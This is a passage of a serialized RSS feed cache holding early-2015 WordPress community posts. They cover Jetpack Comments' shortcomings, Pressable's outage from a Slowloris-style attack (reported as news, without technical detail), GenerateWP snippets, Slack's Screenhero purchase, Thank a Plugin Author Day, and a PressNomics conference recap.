simultaneously.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 20:37:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Why Jetpack Comments is Not A Great Alternative to WordPress’ Native Comment Form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38091\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"http://wptavern.com/why-jetpack-comments-is-not-a-great-alternative-to-wordpress-native-comment-form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7500:\"<p>Jetpack ships with more than <a title=\"http://jetpack.me/\" href=\"http://jetpack.me/\">30 different modules </a>including, <a title=\"http://jetpack.me/support/comments/\" href=\"http://jetpack.me/support/comments/\">Jetpack Comments</a>. One of its primary features is allowing people to login using credentials from their WordPress.com, Twitter, Facebook, or Google+ accounts.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38094\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png?resize=499%2C374\" alt=\"Jetpack Comments Form\" /></a>Jetpack Comments Form\n<p>This module has replaced the WordPress native comment form for nearly two years on WP Tavern. It makes it easier for people on social networks to post a comment, but the convenience comes with several drawbacks.</p>\n<h2>Lack of a Graceful Fallback</h2>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-20439\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png?resize=646%2C201\" alt=\"Jetpack Comments Temporarily Offline\" /></a>Out Of Fuel\n<p>In early 2014, <a title=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\" href=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\">several Tavern readers experienced</a> <strong>Service Temporarily Unavailable</strong> errors when trying to submit a comment. The error was caused by a security setting with <a title=\"http://www.modsecurity.org/\" href=\"http://www.modsecurity.org/\">mod_security</a> on DreamHost and exposed the lack of a graceful fallback. Instead of displaying an error, the iFrame should have been replaced with the native comment form. I <a title=\"https://github.com/Automattic/jetpack/issues/446\" href=\"https://github.com/Automattic/jetpack/issues/446\">created an issue</a> on Github explaining the problem and although it gained immediate attention, not much has happened since.</p>\n<h2>Annoying Page Refreshes</h2>\n<p>It’s normal for articles on the Tavern to have several comments with multi-threaded conversations. I’ve discovered that Jetpack Comments will sometimes take me to a different part of the page after I reply to a comment instead of taking me to where the comment is published. It doesn’t happen all the time, but when it does, it’s annoying.</p>\n<p>It’s 2015, 10 years after the term <a title=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\" href=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\">Ajax was coined by Jesse James Garrett</a>. Ajax stands for Asynchronous JavaScript + XML. It’s a collection of technologies that provide near real-time interaction with page elements. For example, if you leave a comment on a site running the <a title=\"http://p2theme.com/\" href=\"http://p2theme.com/\">P2 theme</a>, it will appear on the site without refreshing the page.</p>\n<p>Page refreshes are distracting, annoying, and break the flow of a conversation. I’m <a title=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\" href=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\">not the first one</a> to request Jetpack Comments be Ajaxified. In an <a title=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\" href=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\">issue on Jetpack’s Github account</a>, George Stephanis, who is a member of the Jetpack development team explains that, while theoretically possible, it’s not high on the priority list.</p>\n<blockquote><p>It’s theoretically possible passing the event through JS <code>window.postMessage</code> — but to actually render the comment would take some theme integration that we can’t presently assume. If someone wanted to write this I’d be fine accepting a pull request that fires an event and passes some limited data back, like the comment ID and status or something, but it’s not high on the priority list.</p></blockquote>\n<p>The ticket has gained little traction with no signs of Ajax support being added anytime soon. His response is similar to Matt Mullenweg’s in <a title=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\" href=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\">episode 130 of WordPress Weekly</a>, when I asked him <a title=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\" href=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\">why comments haven’t changed much</a> in WordPress over the years, “It’s very difficult to iterate comments as it’s hard to get those changes to be compatible with every WordPress theme in the world.”</p>\n<h2>It’s Not Highly Extendable</h2>\n<p>One of the biggest problems I have with Jetpack Comments is that it’s not easily extendable using plugins. Since it’s an iFrame hosted on WordPress.com, it’s hard to manipulate and is an <strong>all or nothing </strong>approach.</p>\n<h2>The Old Comment Form</h2>\n<p>In 2011, I used <a title=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\" href=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\">a collection of plugins</a> to add features to the native comment form so it felt more like a reply box on a forum. Readers had the ability to style and preview comments without having to write code. They could also subscribe to the thread and edit their comment afterwards for up to 10 minutes.</p>\n<p>However, my favorite feature was the Reply link next to each comment. When clicked, the name along with a link to the comment id was automatically added to the comment form. For example, <strong>@<a href=”#comment-11784″ rel=”reply”>Name of Awesome Commenter</a> – Comment text here</strong>. Since the theme didn’t support threaded comments at the time, this feature came in handy.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38095\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png?resize=625%2C657\" alt=\"Comment Form Used on The Tavern in 2011\" /></a>Comment Form Used on The Tavern in 2011\n<p>Although some of the features are replicated in Jetpack Comments, the old form felt like a better experience to me. If you’re a long time commenter on the Tavern, I’m curious if you feel the same way?</p>\n<h2>I Don’t Recommend Jetpack Comments</h2>\n<p>In an era where Twitter, Facebook, etc. provide the ability for real-time communication, Jetpack Comments and the default comment system in WordPress feels like ancient technology. If all you need is an easy way for people to login using their social media accounts to post a comment, Jetpack Comments is a good solution. However, if you need something more robust, look elsewhere.</p>\n<p>Unless the team adds Ajax support for comment submissions and makes the module more extendable, I can’t recommend it as a viable alternative to the native comment form in WordPress.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 18:54:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Recent Pressable Outages the Result of a Slow Loris Attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38064\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wptavern.com/recent-pressable-outages-the-result-of-a-slow-loris-attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3011:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg\" rel=\"prettyphoto[38064]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg?resize=700%2C346\" alt=\"photo credit: BBC Nature\" class=\"size-full wp-image-38071\" /></a>photo credit: <a href=\"http://www.bbc.co.uk/nature/life/Slow_loris\">BBC Nature</a>\n<p>Last week, <a href=\"https://pressable.com/\" target=\"_blank\">Pressable</a> was engaged in a 24/7 struggle to keep its customers’ sites operational. The <a href=\"http://wptavern.com/pressable-struggles-to-retain-customers-following-recent-outages\" target=\"_blank\">recent outages</a> caused some customers 24+ hours of downtime and many closed their accounts in favor of finding an alternative host. Today the company announced that the root cause of the outage customers experienced the week of January 19, 2015, was an intentional attack on Pressable’s systems.</p>\n<p>A <a href=\"https://pressable.com/blog/2015/01/28/root-cause-analysis-outage-week-january-19-2015/\" target=\"_blank\">post</a> on the company’s blog further breaks down the attack: <strong>“Ultimately, the reason for this outage was a well crafted attack on our systems. The attack was a variant of the “<a href=\"http://en.wikipedia.org/wiki/Slowloris_%28software%29\" target=\"_blank\">Slow-Loris</a>” attack discovered in 2009.”</strong></p>\n<p>The attack went undetected because of the insidious manner in which it was executed. Pressable has been working with security professionals to get the attack under control and announced <a href=\"http://status.pressable.com/2015/01/24/all-systems-operational/\" target=\"_blank\">all systems operational</a> on Monday.</p>\n<p>A week ago, after hearing about Pressable’s continued struggle with downtime, I asked CEO Vid Luther if the company was being intentionally sabotaged. At the time, he didn’t think that an attack was a real possibility:</p>\n<blockquote><p>I do not believe that anyone who has an agenda against Pressable is behind these issues. I’m not aware of anyone who has an agenda against Pressable, besides the general competition in the WordPress hosting space, and currently, some of them are acting like vultures. But, I don’t think those guys have the ability to orchestrate something like this. So, unfortunately, no conspiracy theory from our side.</p></blockquote>\n<p>While working to mitigate customer downtime, the Pressable team discovered the coordinated attack on their systems. The attacker’s sophisticated method of sabotaging Pressable went undetected, because it was made to appear that the host’s infrastructure was being overloaded.</p>\n<p>The knowledge of the attack came after multiple apologies from Luther, who originally identified Pressable’s lagging infrastructure as the cause. Luther told the Tavern that he has an idea of who the attackers are but will be digging into it further before calling out any parties publicly.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 22:43:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: GenerateWP Introduces WordPress Custom Code Snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37861\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5357:\"<p><a href=\"http://generatewp.com/\" target=\"_blank\">GenerateWP</a>, the popular WordPress code generator site, is celebrating two years in operation this week. The site, founded by <a href=\"https://profiles.wordpress.org/ramiy\" target=\"_blank\">Rami Yushuvaev</a>, launched with five code generators and now has more than 20. Yushuvaev sees the site as an educational tool that helps WordPress developers learn more about coding best practices.</p>\n<p>Before launching GenerateWP, Yushuvaev created <a href=\"http://www.wp-tricks.co.il/generator/\" target=\"_blank\">three code generators</a> to serve the Israeli WordPress community. The site was an instant success, which prompted him to translate it into English and launch GenerateWP in January 2013.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg?resize=727%2C221\" alt=\"generatewp-hebrew\" class=\"aligncenter size-full wp-image-38035\" /></a></p>\n<p>The first week after launching, Yushuvaev was approached by a major brand that offered to buy the site and a few developers made offers to finance more generators. “I decided that it wasn’t the right time to give up the site, since I had big plans for it and for the WordPress community,” he said.</p>\n<p>The site has 15K+ registered WordPress developers and averages 100,000 visitors per month, most of whom are designers and developers. During the past two years, Yushuvaev worked with contributors Maor Chasen and Ohad Raz to rewrite the entire code base to use object-oriented programming and make it work better with WordPress.</p>\n<p>In celebration of the site’s two year birthday, GenerateWP is introducing custom code snippets, which will allow users to save their own snippets in a public and/or private library. “Front-end designers use <a href=\"http://Codepen.io\" target=\"_blank\">codepen.io</a> to showcase their code, JavaScript developers use <a href=\"http://jsfiddle.net\" target=\"_blank\">jsfiddle.net</a>, Bootstrap developers have <a href=\"http://bootsnipp.com\" target=\"_blank\">bootsnipp.com</a>, and now WordPress developers have <a href=\"http://GenerateWP.com\" target=\"_blank\">GenerateWP.com</a>,” Yushuvaev said.</p>\n<p>The site now includes a collective <a href=\"http://generatewp.com/snippet/\" target=\"_blank\">library of public snippets</a> shared with the community. Users can also browse public snippets by author.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg?resize=963%2C458\" alt=\"rami-snippets\" class=\"aligncenter size-full wp-image-38047\" /></a></p>\n<p>Individual <a href=\"http://generatewp.com/snippet/nvMganl/\" target=\"_blank\">snippets</a> allow users to share, download, or clone the code into their own libraries. Developers can embed snippets on their sites, send them to <a href=\"http://pastebin.com/\" target=\"_blank\">Pastebin</a>, or create a <a href=\"https://gist.github.com/\" target=\"_blank\">GitHub gist</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg?resize=957%2C483\" alt=\"generatewp-snippets\" class=\"aligncenter size-full wp-image-38049\" /></a></p>\n<h3>Future Plans for Expanding GenerateWP</h3>\n<p>Yushuvaev has plans to monetize the site further down the road but said that the generators and code snippets will always remain free. “The money will come from other services,” he said. “I can’t reveal our plans but you can expect a game changing feature for our premium users.”</p>\n<p>In the meantime, the team plans to create new code generators, including a tool to generate widgets, a meta box generator, and admin menu page generators. In the coming weeks, the site will also provide an oEmbed option to embed snippets using nothing but the URL.</p>\n<p>Currently, the most popular generators on the site are the ones for creating custom post types, shortcodes, and custom taxonomies. Yushuvaev is optimistic that the site will continue to grow as more developers discover how much time they can save with the generators.</p>\n<p>I was writing the same code over and over again (post types and taxonomies) for different clients,” he said. “Creating an automatic generator to save some time was the next logical step.” He found that writing code eats up plenty of time and did not want to utilize free plugins, as they often do not remain in active development.</p>\n<p>GenerateWP is quickly becoming a popular tool for WordPress educators. “The site is used in WordPress classes around the world to teach new developers how to properly code using WordPress coding standards,” Yushuvaev said. “We managed to confirm a class in Thailand, universities and colleges in Israel, United States, Canada, and Germany.</p>\n<p>“We also have received requests to translate our tools to other languages,” he said. The GenerateWP team plans to add translations in the near future to open up the site to more international users.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 21:20:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Slack Buys Screenhero\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44638\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/01/slack-buys-screenhero/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:534:\"<p><a href=\"http://techcrunch.com/2015/01/28/slack-buys-screenhero-to-add-screen-sharing-and-voice-chat-to-its-work-messaging-platform/\">Slack Buys Screenhero To Add Screen Sharing And Voice Chat To Its Work Messaging Platform</a>, which I’m very excited about as a daily user of Slack (on 5 teams now) and through <a href=\"http://audrey.co/\">Audrey</a> an investor in <a href=\"https://screenhero.com/\">Screenhero</a> and a big fan of their vision. As the article mentions, Automattic has been a Screenhero customer as well.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 19:47:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"WPTavern: Thank a Plugin Author Day 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37980\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wptavern.com/thank-a-plugin-author-day-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2579:\"<p><a title=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\" href=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\">Created by Matt Mullenweg in 2009,</a> when the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">plugin directory</a> hosted only 4K plugins, Thank a Plugin Author Day (January 28th) motivates users to thank plugin authors.</p>\n<p>There are several ways to celebrate the event, such as visiting the plugin author’s website. The link is usually available via the plugin’s page on WordPress.org. You can also find a link to the author’s website by searching for the plugin in the backend of WordPress. Also, most plugins in the directory have a link to give a monetary donation.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-38009\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png?resize=975%2C527\" alt=\"Plugin Donation Link\" /></a>Plugin Donation Link\n<p>Another way to thank plugin authors is to rate and review their plugins. Ratings and reviews are <a title=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\" href=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\">an easy way to send feedback</a> directly to an author. Make sure to provide actionable feedback instead of one or two-word reviews. A side effect of rating and reviewing plugins, is that it’s one of many ways to contribute back to the WordPress project.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-34331\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png?resize=796%2C267\" alt=\"Billion Thanks Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/opensourceway/7007768456/\">opensourceway</a> – <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>Since the holiday’s creation, over 31K plugins have been added to the directory which results in nearly 36K reasons to use WordPress! <strong>Thank you</strong> to anyone who has ever published a WordPress plugin whether it’s on the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">official directory</a> or on GitHub. Without so many plugins, I wouldn’t be able to customize WordPress to make it my own.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 07:05:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Envato Stats, Tips For Getting Things Done, and More at PressNomics 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37944\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10754:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37971\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png?resize=671%2C288\" alt=\"PressNomics Introduction\" /></a>PressNomics Introduction\n<p>Last week, I attended the third annual <a title=\"http://pressnomics.com/\" href=\"http://pressnomics.com/\">PressNomics conference</a> in Phoenix, AZ. The event focuses on the business side of the WordPress ecosystem and provides opportunities for business owners to learn from those who are blazing a path towards success. On the evening before PressNomics, I joined several business owners for dinner.</p>\n<p>A half hour into the meal, I listened intently to various conversations taking place around the table. Topics of conversation included: market segments, customer satisfaction, and business partnerships. At this point I realized I was definitely at a business conference.</p>\n<h2>The Family Delivers Opening Remarks</h2>\n<p>Joshua and Sally Strebel along with their kids, appeared on stage and delivered the opening remarks. It’s as if the family invited every attendee into their home for a family reunion.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/hashtag/PressNomics?src=hash\">#PressNomics</a> is getting started! <a href=\"http://t.co/DqFGdEidK4\">pic.twitter.com/DqFGdEidK4</a></p>\n<p>— Brian Krogsgard (@Krogsgard) <a href=\"https://twitter.com/Krogsgard/status/558295522725752833\">January 22, 2015</a></p></blockquote>\n<p></p>\n<p>Despite several competing businesses, companies, and products under one roof, I witnessed so many small groups of people discussing strategy as if they’re all friends. I felt a positive energy amongst the crowd and several attendees left the event in high spirits, ready to take their businesses to the next level.</p>\n<h2>Session Highlights</h2>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37973\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg?resize=1024%2C768\" alt=\"A Room Full of Knowledge Seekers\" /></a>Name the people in this image\n<p>The room was packed with attendees for every session since PressNomics chose not to record or live stream the event. The following is a list of memorable points from the sessions I enjoyed most.</p>\n<p><strong>Joshua Strebel interviews Dre Armeda</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"wp-image-37976 size-full\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg?resize=1024%2C768\" alt=\"Joshua Strebel Interviews Dre Armeda\" /></a>Joshua Strebel Interviews Dre Armeda\n<p>Joshua Strebel interviewed Dre Armeda on stage with a bottle of scotch. Aremda described how he became involved with WordPress and founded <a title=\"https://sucuri.net/\" href=\"https://sucuri.net/\">Sucuri</a>, where he turned a two-person part-time hobby into a multi-million dollar, 30+ employee company. He also talked about his role as Vice President of Operations 